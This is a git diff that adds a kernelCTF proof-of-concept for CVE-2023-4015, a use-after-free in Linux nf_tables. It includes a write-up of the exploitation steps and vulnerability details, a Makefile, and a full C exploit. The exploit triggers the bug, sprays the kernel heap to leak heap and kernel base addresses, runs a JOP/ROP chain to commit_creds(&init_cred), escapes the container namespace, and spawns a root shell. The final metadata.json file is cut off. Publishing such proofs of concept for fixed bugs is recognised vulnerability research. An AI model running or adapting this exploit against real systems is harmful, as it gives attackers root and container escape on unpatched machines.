diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-4015_cos/docs/exploit.md new file mode 100644 index 00000000..76834890 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4015_cos/docs/exploit.md @@ -0,0 +1,96 @@ +# CVE-2023-4015 + +This documentation briefly describe the exploit. For more technical details, please look at the exploit source code. + +In order to trigger the vulnerability, `CAP_NET_ADMIN` is required. We can use a namespace sandbox in order to achieve this condition. +Also for all allocations in the kernel heap we make do not span over multiple percpu slabs, we will pin our process to a single CPU. + +## Triggering the vulnerability + +We aim to free a `nft_chain` object resides in `kmalloc-128` cache. + +- Batch 1 + - Create a table `t` + - Create a chain `c1` + - Create a chain `c2` hosting a rule `r2` that has an immediate expression `e2` which binds to `c1` + + `c1->use == 1` +- Batch 2 + - Create a chain `c3` hosting a rule `r3` that has an immediate expression `e3` which binds to `c1` + + `c3` should have `NFT_CHAIN_BINDING` flag + + `c1->use = 2` + - Create a chain `c4` hosting a rule `r4` that has an immediate expression `e4` which binds to `c3` + + However, we will not allow the rule creation to success by adding another immediate expression, which binds to a non-existant chain + + At this point, `nft_rule_expr_deactivate` will be called on `r4` with `phase = NFT_TRANS_PREPARE_ERROR` + + `nft_immediate_deactivate` will be called on `e4` + + Since `c3` has `NFT_CHAIN_BINDING` flag, `nft_rule_expr_deactivate` will be called on `r3`, which will also deactivate `e3` + + `c1->use = 1` because `c1` is bound to `e3` + - Because the batch failed, transaction rollback will be executed with `phase = NFT_TRANS_ABORT` + + `c3`, `r3`, `e3` will be deactivated again + + `c1->use = 0` +- Batch 3 + - Because `c1->use = 0`, we can delete chain `c1` + +After this, we have a dangling reference in `e2` to the freed chain `c1`. +The naming convention here is for demonstration purpose only. In the exploit it will be different. +We will also create a `spray` chain in order to spray the heap using `nft_rule` object later (mostly to avoid accidentally reclaiming the freed chunk when creating new chain). + +## Leak kernel heap address + +When dumping immediate expression binding to another chain, we will get the chain's name. +When the chain is freed, the buffer containing its name is also freed. The address pointing to the name is not cleared. +If we reclaim the freed name buffer, but not the freed chain, we can leak data from the start of the reclaimed object until a NULL byte. +With chunk size 192 (`kmalloc-192`), it is less likely that we will get NULL byte in the address. +So when creating `c1` rule, we set the actual name to be 129-192 bytes long (including NULL terminating character). + +We will use `nft_rule` as the spraying object to reclaim the freed name chunk because: + +- It is an elastic object so we can attack many caches +- The elastic portion are flattened expression array (up to 128 expressions) and arbitrary user data (up to 255 bytes) +- The first field is `list_head` so we can leak heap address of the next rule and the previous rule + +We create a lot of rules with some user data so that the total length of the `nft_rule` struct is in range 129-192 bytes. +After spraying, we request to dump `r2` which will dump `e2` and hopefully we will get the heap address of a `nft_rule` object. +If the leak fails, we will try again. +We will also be able to leak the `handle` of the rule object that reclaimed the freed name chunk. +It will be used to correctly free only the rule that we got the heap address for later stage. + +We will also add a `nft_notrack` expression to the rule so there will be a kernel pointer inside, which we will leak in the next stage once we get the heap leak. The in-memory structure layout of the sprayed rules looks like this (first 0x18 bytes are rule metadata): + +| Offset | Field | Value | +---------|-------|-------| +... +0x18|expression|`nft_notrack_ops` +0x20|`nft_userdata.len`|x +0x21|`nft_userdata.data`|any +... +0xbf|`nft_userdata.data`|any + +## Leak kernel base address + +Now that we have heap leak and we know that a kernel address is inside that chunk, let's leak it by creating a fake chain with name pointing to the leaked heap region by reclaiming the freed chain (reminder: the freed `nft_chain` is in `kmalloc-128` cache). +This time we will spray using `userdata` of `nft_table`. We can store at most 256 bytes of arbitrary data. +We create multiple `nft_table` with different names that has 128 bytes `userdata` with structure layout looks like following: + +| Offset | `nft_chain` field | Value | Remarks | +---------|-------------------|-----------------| +0x0|`list`|any| +0x10|`rules.next`|heap leak|for next stage +0x18|`rules.prev`|heap leak|for next stage +... +0x54|`flags`|`NFT_CHAIN_BINDING`|for next stage +0x58|`name`|heap leak + `sizeof(struct nft_rule)`|where we put `nft_notrack_ops` in the sprayed rule above +... + +After spraying, we request to dump `r2` which will dump `e2` and hopefully we will get the address of `nft_notrack_ops`. + +## RIP control and return to userspace + +As we have `handle` of the rule that got its address leaked, we delete it. +Then, we spray a fake `nft_rule` that also act as a ROP chain. Remember that the deleted rule resided in `kmalloc-192` cache. +We set `dlen` of the fake rule to 1 to pass the expression loop check. +We craft a fake expression that has its `ops` point to the leaked heap. We need to align `ops->deactivate` with a JOP gadget. +Following that, we build a ROP chain that do `commit_creds(&init_cred)`, `switch_task_namespaces(find_task_by_vpid(getpid()), &init_nsproxy)` then return to userspace. + +After spraying, we delete the rule `r2` which will call `nft_rule_expr_deactivate` on `e2`. Since we prepared fake rule list for the reclaimed fake chain, and set its flag to `NFT_CHAIN_BINDING`, the fake rule will be deactivated and the fake expression's `deactivate` routine will be called, which will trigger the JOP gadget then the ROP chain. + +Returning to userspace, we use `setns` to escape from the jail then spawn a root shell using `execve`. diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-4015_cos/docs/vulnerability.md new file mode 100644 index 00000000..655f3d5e --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4015_cos/docs/vulnerability.md @@ -0,0 +1,48 @@ +# CVE-2023-4015 + +In `nft_immediate_deactivate`, if the immediate expression has `dreg == NFT_REG_VERDICT` and has binding to a chain with flag `NFT_CHAIN_BINDING`, it will call `nft_rule_expr_deactivate` on all rules under the bound chain. +This will in turn call `deactivate` method on all expressions belong to the rule. If there's an immediate expression that has binding to a chain, it will go through the same deactivation routine. +Then at the end, the bound chain will has its `use` counter decrease by `1` when `nft_data_release` is called each time this function is called and the transaction phase is not `NFT_TRANS_COMMIT`. + +Problem arises if this function is called twice on an expression in a single transaction in any phases other than `NFT_TRANS_COMMIT`, the bound chain's `use` will be decreased by `2`. +Considering the case when the chain has 2 objects holding reference to it, the `use` of the chain will be `0`, which allows the chain to be deleted and leaving a dangling reference. + +Before commit [26b5a5712eb85e253724e56a54c17f8519bd8e4e](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=26b5a5712eb85e253724e56a54c17f8519bd8e4e), there are no vulnerable code paths. +However the commit introduced `NFT_TRANS_PREPARE_ERROR` phase, which opened up a way to achieve the UAF condition because when error happens when creating a rule, it will call deactivate on successfully created expressions, which could be immediate expressions binding to a chain created in the same batch. +The chain in the batch will also be deactivated again when rolling back the transaction. +Detailed demonstration of the UAF can be seen in exploit.md. + +## Requirements to trigger the vulnerability + +|Capabilities|Kernel configuration|Are user namespaces needed?| +|---|---|---| +|CAP_NET_ADMIN|CONFIG_NF_TABLES|Yes| + +## Commit which introduced the vulnerability + +https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=26b5a5712eb85e253724e56a54c17f8519bd8e4e + +## Commit which fixed the vulnerability + +https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a771f7b266b02d262900c75f1e175c7fe76fec2 + +## Affected kernel versions + +- 5.10.188 - 5.10.189 +- 5.15.119 - 5.15.123 +- 6.1.36 - 6.1.42 +- 6.3.10 - 6.3.13 +- 6.4 - 6.4.7 +- 6.5-rc1 - 6.5-rc3 + +## Affected component, subsystem + +netfilter/nf_tables + +## Cause + +Use-after-free + +## Which syscalls or syscall parameters are needed to be blocked to prevent triggering the vulnerability? + +Disable the ability to communicate with nf_tables subsystem under unprivileged user namespace, or prevent creation of unprivileged user namespace. diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/.gitignore b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/.gitignore new file mode 100644 index 00000000..3f9cfafd --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/.gitignore @@ -0,0 +1 @@ +deps diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/Makefile b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/Makefile new file mode 100644 index 00000000..c2ce1e8a --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/Makefile @@ -0,0 +1,16 @@ +CFLAGS=-D_GNU_SOURCE -std=gnu17 -Wall -O0 -static -I./deps/include +LIBS=deps/lib/libnftnl.a deps/lib/libmnl.a + +.PHONY: exploit +exploit: + $(CC) $(CFLAGS) exploit.c -o exploit $(LIBS) + +prerequisites: + mkdir -p deps + wget -O libmnl-1.0.5.tar.bz2 https://www.netfilter.org/pub/libmnl/libmnl-1.0.5.tar.bz2 + tar -xf libmnl-1.0.5.tar.bz2 + cd libmnl-1.0.5 && ./configure --prefix=$(PWD)/deps --enable-static=yes --enable-shared=no && make install + wget -O libnftnl-1.2.8.tar.xz https://www.netfilter.org/pub/libnftnl/libnftnl-1.2.8.tar.xz + tar -xf libnftnl-1.2.8.tar.xz + cd libnftnl-1.2.8 && LIBMNL_CFLAGS=-I$(PWD)/deps/include LIBMNL_LIBS=$(PWD)/deps/lib/libmnl.a ./configure --prefix=$(PWD)/deps --enable-static=yes --enable-shared=no && make install + rm -rf libmnl* libnftnl* diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/exploit b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/exploit new file mode 100755 index 00000000..d5f87476 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/exploit.c b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/exploit.c new file mode 100644 index 00000000..18c70c60 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/exploit.c @@ -0,0 +1,654 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define INFO(fmt, ...) fprintf(stderr, "[*] " fmt "\n", ##__VA_ARGS__) +#define WARN(fmt, ...) fprintf(stderr, "[!] " fmt "\n", ##__VA_ARGS__) +#define ERROR(msg) fprintf(stderr, "[-] %s:%d: %s: %s\n", __func__, __LINE__, msg, strerror(errno)) + +#define SPRAY_BATCH_SIZE 64 +#define SPRAY_BATCHES 16 + +#define NFT_NOTRACK_OPS 0x1ac8cc0 // nft_notrack_ops +#define INIT_NSPROXY 0x2461f40 +#define COMMIT_CREDS 0x110980 +#define FIND_TASK_BY_VPID 0x1077c0 +#define SWITCH_TASK_NAMESPACES 0x10efa0 +#define KPTI_TRAMPOLINE 0x1201090 + 0x36 // swapgs_restore_regs_and_return_to_usermode + offset +#define INIT_CRED 0x2462180 + +#define PUSH_RSI_JMP_QWORD_PTR_RSI_F 0xc6b728 // push rsi ; jmp qword ptr [rsi + 0xf] +#define POP_RSP_R13_R14_R15_RET 0x67f4e // pop rsp ; pop r13 ; pop r14 ; pop r15 ; jmp 0xffffffff82404200 -> ret +#define POP_RDI_RET 0x5dd5c0 // pop rdi ; ret +#define POP_RSI_RET 0x57f44e // pop rsi ; ret +#define POP_RDX_RET 0x57f34e // pop rdx ; ret +#define MOV_RDI_RAX_CMP_RDI_RDX_JNE_XOR_EAX_EAX_RET 0x7deb7e // mov rdi, rax ; cmp rdi, rdx ; jne 0xffffffff817deb75 ; xor eax, eax ; jmp 0xffffffff82404200 -> ret + +struct list_head { + struct list_head *next, *prev; +}; + +struct rhash_head { + struct rhash_head *next; +}; + +struct rhlist_head { + struct rhash_head rhead; + struct rhlist_head *next; +}; + +struct msg_msgseg { + struct msg_msgseg *next; +}; + +struct nft_expr { + struct nft_expr_ops *ops; + unsigned char data[] + __attribute__((aligned(__alignof__(uint64_t)))); +}; + +struct nft_rule { + struct list_head list; + uint64_t handle:42, + genmask:2, + dlen:12, + udata:1; + unsigned char data[] + __attribute__((aligned(__alignof__(struct nft_expr)))); +}; + +struct nft_rule_dp { + uint64_t is_last:1, + dlen:12, + handle:42; /* for tracing */ + unsigned char data[] + __attribute__((aligned(__alignof__(struct nft_expr)))); +}; + +struct nft_rule_blob { + unsigned long size; + unsigned char data[] + __attribute__((aligned(__alignof__(struct nft_rule_dp)))); +}; + +struct nft_chain { + struct nft_rule_blob *blob_gen_0; + struct nft_rule_blob *blob_gen_1; + struct list_head rules; + struct list_head list; + struct rhlist_head rhlhead; + struct nft_table *table; + uint64_t handle; + uint32_t use; + uint8_t flags:5, + bound:1, + genmask:2; + char *name; + uint16_t udlen; + uint8_t *udata; + + /* Only used during control plane commit phase: */ + struct nft_rule_blob *blob_next; +}; + +struct nft_userdata { + uint8_t len; + unsigned char data[]; +}; + +typedef struct mnl_socket *sock; +typedef struct mnl_nlmsg_batch *batch; +typedef struct nlmsghdr *nlmsghdr; +typedef struct nftnl_table *table; +typedef struct nftnl_chain *chain; +typedef struct nftnl_rule *rule; +typedef struct nftnl_expr *expr; + +static sock nlsock; +static const uint16_t family = NFPROTO_IPV4; +static uint32_t seq = 1, rseq = 1, table_counter; +static char current_table_name[16], free_chain_name[160]; // to make the freed chain name fall in kmalloc-192 +static uint64_t heap, vmlinux, rule_handle; +static uint64_t user_cs, user_ss, user_rflags, user_sp; + +static void save_state() { + __asm__( + ".intel_syntax noprefix;" + "mov user_cs, cs;" + "mov user_ss, ss;" + "mov user_sp, rsp;" + "pushf;" + "pop user_rflags;" + ".att_syntax;" + ); +} + +void monke() { + INFO("Return to monke"); + + setns(open("/proc/1/ns/mnt", O_RDONLY), 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + char *args[] = {"/bin/bash", "-i", NULL}; + execve(args[0], args, NULL); +} + +static table make_table(const char *name, const void *udata, uint32_t udlen) { + table t = nftnl_table_alloc(); + if (t == NULL) + return NULL; + + nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family); + nftnl_table_set_str(t, NFTNL_TABLE_NAME, name); + + if (udata != NULL && udlen > 0) + nftnl_table_set_data(t, NFTNL_TABLE_USERDATA, udata, udlen); + + return t; +} + +static chain make_chain(const char *table, const char *name, uint32_t flags) { + chain c = nftnl_chain_alloc(); + if (c == NULL) + return NULL; + + nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table); + nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, name); + nftnl_chain_set_u32(c, NFTNL_CHAIN_FLAGS, flags); + + return c; +} + +static rule make_rule(const char *table, const char *chain, expr *exprs, size_t num_exprs, const void *udata, uint32_t udlen, uint64_t handle) { + rule r = nftnl_rule_alloc(); + if (r == NULL) + return NULL; + + nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, family); + nftnl_rule_set_str(r, NFTNL_RULE_TABLE, table); + nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, chain); + + for (int i = 0; i < num_exprs; ++i) + nftnl_rule_add_expr(r, exprs[i]); + + if (udlen > 0) + nftnl_rule_set_data(r, NFTNL_RULE_USERDATA, udata, udlen); + + if (handle > 0) + nftnl_rule_set_u64(r, NFTNL_RULE_HANDLE, handle); + + return r; +} + +static expr make_immediate_jump_expr(const char *target_chain) { + expr e = nftnl_expr_alloc("immediate"); + if (e == NULL) + return NULL; + + nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT); + nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, NFT_JUMP); + nftnl_expr_set_str(e, NFTNL_EXPR_IMM_CHAIN, target_chain); + + return e; +} + +static expr make_notrack_expr() { + return nftnl_expr_alloc("notrack"); +} + +static batch batch_init(size_t size) { + void *buf = malloc(size); + batch b = mnl_nlmsg_batch_start(buf, size); + nftnl_batch_begin(mnl_nlmsg_batch_current(b), seq++); + mnl_nlmsg_batch_next(b); + rseq = seq; + return b; +} + +static void batch_end(batch b) { + nftnl_batch_end(mnl_nlmsg_batch_current(b), seq); + mnl_nlmsg_batch_next(b); +} + +static ssize_t batch_send(batch b, sock s) { + return mnl_socket_sendto(s, mnl_nlmsg_batch_head(b), mnl_nlmsg_batch_size(b)); +} + +static void batch_free(batch b) { + free(mnl_nlmsg_batch_head(b)); + mnl_nlmsg_batch_stop(b); +} + +static void batch_new_table(batch b, table t) { + nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_NEWTABLE, family, NLM_F_ACK | NLM_F_CREATE | NLM_F_APPEND, seq++); + nftnl_table_nlmsg_build_payload(hdr, t); + mnl_nlmsg_batch_next(b); +} + +static void batch_new_chain(batch b, chain c) { + nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_NEWCHAIN, family, NLM_F_ACK | NLM_F_CREATE | NLM_F_APPEND, seq++); + nftnl_chain_nlmsg_build_payload(hdr, c); + mnl_nlmsg_batch_next(b); +} + +static void batch_del_chain(batch b, chain c) { + nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_DELCHAIN, family, NLM_F_ACK, seq++); + nftnl_chain_nlmsg_build_payload(hdr, c); + mnl_nlmsg_batch_next(b); +} + +static void batch_new_rule(batch b, rule r) { + nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_NEWRULE, family, NLM_F_ACK | NLM_F_CREATE | NLM_F_APPEND, seq++); + nftnl_rule_nlmsg_build_payload(hdr, r); + mnl_nlmsg_batch_next(b); +} + +static void batch_del_rule(batch b, rule r) { + nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_DELRULE, family, NLM_F_ACK, seq++); + nftnl_rule_nlmsg_build_payload(hdr, r); + mnl_nlmsg_batch_next(b); +} + +static nlmsghdr dump_rule(rule r, char *buf) { + nlmsghdr hdr = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETRULE, family, NLM_F_ACK, seq++); + nftnl_rule_nlmsg_build_payload(hdr, r); + return hdr; +} + +static int run_callbacks(sock s, mnl_cb_t cb, void *data) { + // INFO("Start callback: rseq = %d, seq = %d", rseq, seq); + char buf[MNL_SOCKET_BUFFER_SIZE]; + int ret = 0; + while (rseq < seq) { + ret = mnl_socket_recvfrom(s, buf, sizeof(buf)); + if (ret <= 0) + break; + ret = mnl_cb_run(buf, ret, rseq, mnl_socket_get_portid(s), cb, data); + if (ret < 0) + break; + rseq += ret == 0; + } + // INFO("End callback: rseq = %d, seq = %d", rseq, seq); + return ret; +} + +static int setup() { + // In order to use nf_tables, we need CAP_NET_ADMIN + INFO("Setting up user namespace"); + + if (unshare(CLONE_NEWUSER | CLONE_NEWNET)) { + ERROR("unshare(CLONE_NEWUSER | CLONE_NEWNET)"); + return -1; + } + + // Pin process to a single CPU to avoid nf_tables allocations to spill over different slabs + INFO("Pinning process to CPU #0"); + + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(0, &set); + if (sched_setaffinity(getpid(), sizeof(set), &set) == -1) { + ERROR("sched_setaffinity"); + return -1; + } + + INFO("Creating netfilter netlink socket"); + if ((nlsock = mnl_socket_open(NETLINK_NETFILTER)) == NULL) { + ERROR("mnl_socket_open(NETLINK_NETFILTER)"); + return -1; + } + + return 0; +} + +static int trigger_uaf() { + INFO("Triggering UAF"); + + sprintf(current_table_name, "%d", table_counter++); + table t = make_table(current_table_name, NULL, 0); + chain c_free = make_chain(current_table_name, free_chain_name, 0); + chain c_spray = make_chain(current_table_name, "spray", 0); + chain c_primitive = make_chain(current_table_name, "primitive", 0); + expr e_primitive = make_immediate_jump_expr(free_chain_name); + rule r_primitive = make_rule(current_table_name, "primitive", &e_primitive, 1, NULL, 0, 0); + + batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); + batch_new_table(b, t); + batch_new_chain(b, c_free); + batch_new_chain(b, c_spray); + batch_new_chain(b, c_primitive); + batch_new_rule(b, r_primitive); + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return -1; + } + batch_free(b); + if (run_callbacks(nlsock, NULL, NULL) < 0) { + ERROR("run_callbacks"); + return -1; + } + + chain c_effect = make_chain(current_table_name, "effect", NFT_CHAIN_BINDING); + expr e_effect = make_immediate_jump_expr(free_chain_name); + rule r_effect = make_rule(current_table_name, "effect", &e_effect, 1, NULL, 0, 0); + chain c_attack = make_chain(current_table_name, "attack", 0); + expr e_attack[2]; + e_attack[0] = make_immediate_jump_expr("effect"); + e_attack[1] = make_immediate_jump_expr("some_invalid_chain"); + rule r_attack = make_rule(current_table_name, "attack", e_attack, 2, NULL, 0, 0); + + b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); + batch_new_chain(b, c_effect); + batch_new_rule(b, r_effect); + batch_new_chain(b, c_attack); + batch_new_rule(b, r_attack); + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return -1; + } + batch_free(b); + run_callbacks(nlsock, NULL, NULL); + + b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); + batch_del_chain(b, c_free); + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return -1; + } + batch_free(b); + if (run_callbacks(nlsock, NULL, NULL) < 0) { + ERROR("run_callbacks"); + return -1; + } + + INFO("Sleeping to wait for the work queue to actually free the chain"); + sleep(1); + + return 0; +} + +static int dump_expr_leak_heap(expr e, void *dat) { + const char *data; + + data = nftnl_expr_get_str(e, NFTNL_EXPR_IMM_CHAIN); + if (strlen(data) < 17) // list + handle + return MNL_CB_OK; + + struct nft_rule *r = (struct nft_rule *)data; + heap = (uint64_t)r->list.next; + rule_handle = (r->handle & 0xffff) + 1; // we got the address of the next rule, handle should be +1 + if ((heap & 0xff) == 0x90 || (heap & 0xff) == 0x10) { // we got leak to spray chain (rules list at offset 0x10 of nft_chain) + heap = (uint64_t)r->list.prev; // get address of a rule instead + rule_handle = (r->handle & 0xffff) - 1; // we got the address of the previous rule, handle should be -1 + } + INFO("heap = 0x%lx, rule_handle = %lu", heap, rule_handle); + + return MNL_CB_OK; +} + +static int dump_expr_leak_vmlinux(expr e, void *dat) { + const char *data; + + data = nftnl_expr_get_str(e, NFTNL_EXPR_IMM_CHAIN); + if (strlen(data) < 8) + return MNL_CB_OK; + + vmlinux = *(uint64_t *)data; + if (vmlinux >= 0xffffffff00000000) { + vmlinux -= NFT_NOTRACK_OPS; + } + INFO("vmlinux = 0x%lx", vmlinux); + + return MNL_CB_OK; +} + +static int dump_exprs(const struct nlmsghdr *nlh, void *data) { + rule r; + + r = nftnl_rule_alloc(); + nftnl_rule_nlmsg_parse(nlh, r); + + nftnl_expr_foreach(r, data, NULL); + + nftnl_rule_free(r); + + return MNL_CB_OK; +} + +static int leak_heap() { + INFO("Trying to leak kernel heap"); + + char data[191 - sizeof(struct nft_expr) - sizeof(struct nft_rule)] = {0}; // to make the rule fall in kmalloc-192 + expr e = make_notrack_expr(); // for leaking vmlinux later + rule r = make_rule(current_table_name, "spray", &e, 1, data, sizeof(data), 0); + + for (int z = 0; z < SPRAY_BATCHES; ++z) { + batch b = batch_init(1048576); // 1M buffer should be enough + for (int i = 0; i < SPRAY_BATCH_SIZE; ++i) { + batch_new_rule(b, r); + } + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return -1; + } + batch_free(b); + if (run_callbacks(nlsock, NULL, NULL) < 0) { + ERROR("run_callbacks"); + return -1; + } + } + + char buf[MNL_SOCKET_BUFFER_SIZE]; + rule r_primitive = make_rule(current_table_name, "primitive", NULL, 0, NULL, 0, 4); // the primitive rule has handle = 4 + rseq = seq; + nlmsghdr hdr = dump_rule(r_primitive, buf); + if (mnl_socket_sendto(nlsock, buf, hdr->nlmsg_len) < 0) { + ERROR("mnl_socket_sendto"); + return -1; + } + if (run_callbacks(nlsock, dump_exprs, dump_expr_leak_heap) < 0) { + ERROR("run_callbacks"); + return -1; + } + + return 0; +} + +static int leak_vmlinux() { + INFO("Trying to leak kernel base"); + static int table_spray_counter = 0; + + char data[128] = {0}; + struct nft_chain *fake_chain = (struct nft_chain *)data; + // set rule list and chain flag for later stage + // because we trigger RIP control by deleting the primitive rule, + // the immediate expression deactivation will only call deactivate() + // on the rules under this chain if chain flags has NFT_CHAIN_BINDING. + fake_chain->rules.next = fake_chain->rules.prev = (struct list_head *)heap; + fake_chain->flags = NFT_CHAIN_BINDING; + // exprs are flattened after rule metadata, then comes userdata + // we prepared a notrack expr before, now let's leak its ops + fake_chain->name = (char *)(heap + sizeof(struct nft_rule)); + + for (int z = 0; z < SPRAY_BATCHES; ++z) { + batch b = batch_init(1048576); // 1M buffer should be enough + for (int i = 0; i < SPRAY_BATCH_SIZE; ++i) { + char table_name[32]; + sprintf(table_name, "tskb%d", table_spray_counter++); + table t = make_table(table_name, data, sizeof(data)); + batch_new_table(b, t); + nftnl_table_free(t); + } + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return -1; + } + batch_free(b); + if (run_callbacks(nlsock, NULL, NULL) < 0) { + ERROR("run_callbacks"); + return -1; + } + } + + char buf[MNL_SOCKET_BUFFER_SIZE]; + rule r_primitive = make_rule(current_table_name, "primitive", NULL, 0, NULL, 0, 4); // the primitive rule has handle = 4 + rseq = seq; + nlmsghdr hdr = dump_rule(r_primitive, buf); + if (mnl_socket_sendto(nlsock, buf, hdr->nlmsg_len) < 0) { + ERROR("mnl_socket_sendto"); + return -1; + } + if (run_callbacks(nlsock, dump_exprs, dump_expr_leak_vmlinux) < 0) { + ERROR("run_callbacks"); + return -1; + } + + return 0; +} + +static int spray_krop() { + INFO("Spraying KROP"); + static int table_spray_counter = 0; + + rule r_to_delete = make_rule(current_table_name, "spray", NULL, 0, NULL, 0, rule_handle); + + batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); + batch_del_rule(b, r_to_delete); + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return -1; + } + batch_free(b); + if (run_callbacks(nlsock, NULL, NULL) < 0) { + ERROR("run_callbacks"); + return -1; + } + + INFO("Sleeping to wait for the work queue to actually free the rule"); + sleep(1); + + save_state(); + + char data[192] = {0}; + struct nft_rule *fake_rule = (struct nft_rule *)data; + fake_rule->dlen = 1; // pass the check + struct nft_expr *fake_expr = (struct nft_expr *)(data + sizeof(struct nft_rule)); + fake_expr->ops = (struct nft_expr_ops *)(heap + 0x88 - 0x28); // offset 0x88 of fake rule <=> expr->ops->deactivate (offset 0x28 of expr->ops) + // the jop gadget jumps to [rsi + 0xf] so we put the stack pivot gadget there + *(uint64_t *)((char *)fake_expr + 0xf) = vmlinux + POP_RSP_R13_R14_R15_RET; + + uint64_t *rop = (uint64_t *)(data + sizeof(struct nft_rule) + sizeof(struct nft_expr)); + + // pass through the stack pivot gadget + rop++; + rop++; + + // commit_creds(&init_cred) + *rop++ = vmlinux + POP_RDI_RET; + *rop++ = vmlinux + INIT_CRED; + *rop++ = vmlinux + COMMIT_CREDS; + + // switch_task_namespaces(find_task_by_vpid(getpid()), &init_nsproxy) + *rop++ = vmlinux + POP_RDI_RET; + *rop++ = getpid(); + *rop++ = vmlinux + FIND_TASK_BY_VPID; + *rop++ = vmlinux + MOV_RDI_RAX_CMP_RDI_RDX_JNE_XOR_EAX_EAX_RET; + *rop++ = vmlinux + POP_RSI_RET; + *rop++ = vmlinux + INIT_NSPROXY; + *rop++ = vmlinux + SWITCH_TASK_NAMESPACES; + + // return to userspace + *rop++ = vmlinux + KPTI_TRAMPOLINE; + *rop++ = vmlinux + PUSH_RSI_JMP_QWORD_PTR_RSI_F; // jop gadget, put here because this space is unused + rop++; + *rop++ = (uint64_t)monke; + *rop++ = user_cs; + *rop++ = user_rflags; + *rop++ = user_sp; + *rop++ = user_ss; + + for (int z = 0; z < SPRAY_BATCHES; ++z) { + batch b = batch_init(1048576); // 1M buffer should be enough + + for (int i = 0; i < SPRAY_BATCH_SIZE; ++i) { + char table_name[32]; + sprintf(table_name, "tsrp%d", table_spray_counter++); + table t = make_table(table_name, data, sizeof(data)); + batch_new_table(b, t); + nftnl_table_free(t); + } + + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return -1; + } + batch_free(b); + if (run_callbacks(nlsock, NULL, NULL) < 0) { + ERROR("run_callbacks"); + return -1; + } + } + + return 0; +} + +static void escalate() { + INFO("Escalating privileges"); + + // deleting the primitive rule will call deactivate on the bound chain + // because we set the flag of the reclaimed fake chain to `NFT_CHAIN_BINDING`, + // all expressions under all rules of that chain will have its deactivate() routine. + rule r = make_rule(current_table_name, "primitive", NULL, 0, NULL, 0, 4); // the primitive rule has handle = 4 + batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); + batch_del_rule(b, r); + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return; + } + batch_free(b); +} + +int main() { + if (setup() == -1) + return -1; + + memset(free_chain_name, 'A', sizeof(free_chain_name) - 1); + free_chain_name[sizeof(free_chain_name) - 1] = '\0'; + + while (heap < 0xffff000000000000) { + if (trigger_uaf() == -1) + return -1; + + if (leak_heap() == -1) + return -1; + } + + while (vmlinux < 0xffffffff00000000) { + if (leak_vmlinux() == -1) + return -1; + } + + if (spray_krop() == -1) + return -1; + + escalate(); +} diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/metadata.json b/pocs/linux/kernelctf/CVE-2023-4015_cos/metadata.json new file mode 100644 index 00000000..57f29f70 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4015_cos/metadata.json @@ -0,0 +1,38 @@ +{ + "$schema": 